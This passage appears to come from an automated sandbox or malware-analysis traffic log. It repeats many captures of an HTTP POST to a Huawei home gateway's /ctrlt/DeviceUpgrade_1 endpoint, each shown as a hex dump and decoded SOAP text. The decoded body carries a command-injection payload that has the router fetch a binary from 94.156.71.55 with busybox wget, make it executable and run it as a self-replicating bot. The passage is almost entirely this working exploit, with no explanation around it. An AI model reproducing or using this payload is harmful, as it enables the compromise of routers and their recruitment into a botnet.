20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" 